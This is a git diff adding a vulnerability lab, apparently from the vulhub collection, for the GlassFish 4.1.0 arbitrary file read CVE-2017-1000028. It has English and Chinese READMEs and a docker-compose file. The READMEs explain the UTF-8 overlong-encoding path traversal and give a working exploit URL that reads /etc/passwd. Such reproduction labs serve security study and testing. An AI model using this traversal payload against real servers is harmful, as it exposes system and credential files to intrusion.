first commit

2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
--- a/glassfish/CVE-2017-1000028/1.png
+++ b/glassfish/CVE-2017-1000028/1.png
--- a/glassfish/CVE-2017-1000028/README.md
+++ b/glassfish/CVE-2017-1000028/README.md
@@ -0,0 +1,36 @@
+# GlassFish 4.1.0 Arbitrary File Read (CVE-2017-1000028)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+GlassFish is an open-source application server for the Java EE platform. A vulnerability in GlassFish allows attackers to read arbitrary files through UTF-8 Overlong Encoding attack.
+
+The vulnerability exists because GlassFish does not properly handle UTF-8 Overlong Encoding when decoding URLs. As a result, `%c0%ae` is decoded as the ASCII character `.` (dot). By using `%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/` in the URL, an attacker can traverse directories and read arbitrary files on the system.
+
+References:
+
+- <https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904>
+- <https://www.leavesongs.com/PENETRATION/utf-8-overlong-encoding.html>
+
+## Environment Setup
+
+Execute the following command to start a GlassFish server 4.1:
+
+```
+docker compose up -d
+```
+
+After the server starts, you can access GlassFish Admin Console on `http://your-ip:4848`.
+
+## Vulnerability Reproduction
+
+Visit the following URL to read the contents of `/etc/passwd`:
+
+```
+https://your-ip:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
+```
+
+![](1.png)
+
+### Additional Notes
+
+The super administrator password is set in `docker-compose.yml`, with a default value of `vulhub_default_password`. You can use this password to log in to the admin account on port 4848.
--- a/glassfish/CVE-2017-1000028/README.zh-cn.md
+++ b/glassfish/CVE-2017-1000028/README.zh-cn.md
@@ -0,0 +1,34 @@
+# GlassFish 4.1.0 任意文件读取漏洞
+
+GlassFish是一个用于Java EE平台的开源应用服务器。在GlassFish中存在一个漏洞，攻击者可以通过UTF-8 Overlong Encoding攻击读取任意文件。
+
+该漏洞产生的原因是GlassFish在解码URL时没有正确处理UTF-8 Overlong Encoding，导致将`%c0%ae`解析为ASCII字符的`.`（点）。攻击者可以通过在URL中使用`%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/`来实现目录遍历，从而读取系统上的任意文件。
+
+参考链接：
+
+- <https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904>
+- <https://www.leavesongs.com/PENETRATION/utf-8-overlong-encoding.html>
+
+## 环境搭建
+
+执行如下命令启动一个GlassFish 4.1.0服务器：
+
+```
+docker compose up -d
+```
+
+环境启动后，你可以通过`http://your-ip:4848`访问GlassFish管理控制台：
+
+## 漏洞复现
+
+访问以下URL可以读取`/etc/passwd`的内容：
+
+```
+https://your-ip:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
+```
+
+![](1.png)
+
+### 补充说明
+
+超级管理员密码在`docker-compose.yml`中设置，默认值为`vulhub_default_password`。你可以使用此密码在4848端口登录管理员账户。
--- a/glassfish/CVE-2017-1000028/docker-compose.yml
+++ b/glassfish/CVE-2017-1000028/docker-compose.yml
@@ -0,0 +1,9 @@
+services:
+ glassfish:
+   image: vulhub/glassfish:4.1
+   ports:
+    - "4848:4848"
+    - "5005:5005"
+   environment:
+    - ADMIN_PASSWORD=vulhub_default_password
+    - JAVA_DEBUGGER_PORT=5005